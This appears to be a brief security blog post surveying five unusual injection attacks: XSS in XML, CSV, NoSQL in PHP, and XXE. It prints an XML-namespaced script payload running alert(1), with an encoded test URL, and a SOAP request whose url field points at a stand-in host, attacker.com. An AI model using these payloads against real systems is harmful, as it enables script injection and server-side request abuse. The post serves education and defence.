Five Interesting Injection Attacks

Nick Galbreath

Everyone is familiar with SQLi and XSS. To make things more interesting, here are five more unusual injection attacks that have appeared recently.

In no particular order:

XSS in your XML

This “XSS in XML” exploit appears to work in Chrome but not Safari (and didn’t test in Firefox).

http://sdl.me/XSSDemo/xss-xml-frames.html

Another XSS in your XML

<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="data:,alert(1)" />

http://vulnerabledoma.in/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E

via

CSV Injection

Yes, “Comma Separated Value” injection. Really??? https://blog.zsec.uk/csv-dangers-mitigations/ The advice is the usual

It should also be considered that all user input be not trusted and as a result any output should be encoded.

NoSQL Injection

This should really be NoSQL injection using PHP, as the techniques appear to specific to PHP’s drivers.

This may or may not be a re-hash of Analysis and Mitigation of NoSQL Injections which came out a few months earlier.

NoSQL data storage systems have become very popular due to their scalability and ease of use. Unfortunately, they lack the security measures and awareness that are required for data protection. Although the new data models and query formats of NoSQL data stores make old attacks such as SQL injections irrelevant, they give attackers new opportunities for injecting their malicious code into the statements passed to the database. Analysis of the techniques for injecting malicious code into NoSQL data stores provides examples of new NoSQL injections as well as Cross-Site Request Forgery attacks, allowing attackers to bypass perimeter defenses such as firewalls. Analysis of the source of these vulnerabilities and present methodologies can mitigate such attacks. Because code analysis alone is insufficient to prevent attacks in today’s typical large-scale deployment, certain mitigations should be done throughout the entire software life cycle.

XXE Injection

XXE Injection is always a bit of a weirdo.

By uploading a XML file with an external XML entity, you can make the server send or retrieve arbitrary files or URLs. The example here is:

<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
 <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
   <url>attacker.com</url>
 </m:XXX>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>